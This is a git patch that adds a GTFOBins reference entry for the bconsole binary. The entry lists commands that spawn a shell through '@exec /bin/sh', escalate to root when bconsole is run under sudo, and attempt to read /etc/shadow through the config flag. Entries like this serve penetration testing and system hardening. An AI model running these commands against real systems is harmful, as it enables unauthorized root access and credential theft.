From 170c1f5db7dd96e208ec160275c507e72f63e970 Mon Sep 17 00:00:00 2001 From: PunshLineLama <28300956+punshLineLama@users.noreply.github.com> Date: Fri, 16 Dec 2022 11:39:52 -0500 Subject: [PATCH] Create bconsole Co-authored-by: Andrea Cardaci --- _gtfobins/bconsole.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 _gtfobins/bconsole.md diff --git a/_gtfobins/bconsole.md b/_gtfobins/bconsole.md new file mode 100644 index 0000000..3dbfffb --- /dev/null +++ b/_gtfobins/bconsole.md @@ -0,0 +1,14 @@ +--- +functions: + shell: + - code: | + bconsole + @exec /bin/sh + sudo: + - code: | + sudo bconsole + @exec /bin/sh + file-read: + - description: The file is actually parsed and the first wrong line is returned in an error message, thus it may not be suitable for reading arbitrary files. + code: bconsole -c /etc/shadow +---